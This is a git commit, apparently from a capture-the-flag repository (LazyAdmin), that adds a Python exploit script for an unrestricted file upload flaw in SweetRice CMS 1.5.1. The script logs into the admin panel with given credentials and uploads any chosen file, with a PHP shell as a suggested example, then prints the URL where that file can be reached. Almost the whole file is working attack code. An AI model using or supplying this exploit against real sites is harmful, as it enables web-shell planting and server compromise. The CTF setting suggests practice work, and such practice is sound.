initial commit

CTF/LazyAdmin/40716.py

@@ -0,0 +1,68 @@
+#/usr/bin/python
+#-*- Coding: utf-8 -*-
+# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload
+# Exploit Author: Ashiyane Digital Security Team
+# Date: 03-11-2016
+# Vendor: http://www.basic-cms.org/
+# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
+# Version: 1.5.1
+# Platform: WebApp - PHP - Mysql
+
+import requests
+import os
+from requests import session
+
+if os.name == 'nt':
+    os.system('cls')
+else:
+    os.system('clear')
+    pass
+banner = '''
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+|  _________                      __ __________.__                  |
+| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
+| \_____  \\ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
+| /        \\     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
+|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
+|        \/             \/     \/            \/        \/    \/     |
+|    > SweetRice 1.5.1 Unrestricted File Upload                     |
+|    > Script Cod3r : Ehsan Hosseini                                |
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+'''
+
+print(banner)
+
+
+# Get Host & User & Pass & filename
+host = input("Enter The Target URL(Example : localhost.com) : ")
+username = input("Enter Username : ")
+password = input("Enter Password : ")
+filename = input("Enter FileName (Example:.htaccess,shell.php5,index.html) : ")
+file = {'upload[]': open(filename, 'rb')}
+
+payload = {
+    'user':username,
+    'passwd':password,
+    'rememberMe':''
+}
+
+
+
+with session() as r:
+    login = r.post('http://' + host + '/as/?type=signin', data=payload)
+    success = 'Login success'
+    if login.status_code == 200:
+        print("[+] Sending User&Pass...")
+        if login.text.find(success) > 1:
+            print("[+] Login Succssfully...")
+        else:
+            print("[-] User or Pass is incorrent...")
+            print("Good Bye...")
+            exit()
+            pass
+        pass
+    uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file)
+    if uploadfile.status_code == 200:
+        print("[+] File Uploaded...")
+        print("[+] URL : http://" + host + "/attachment/" + filename)
+        pass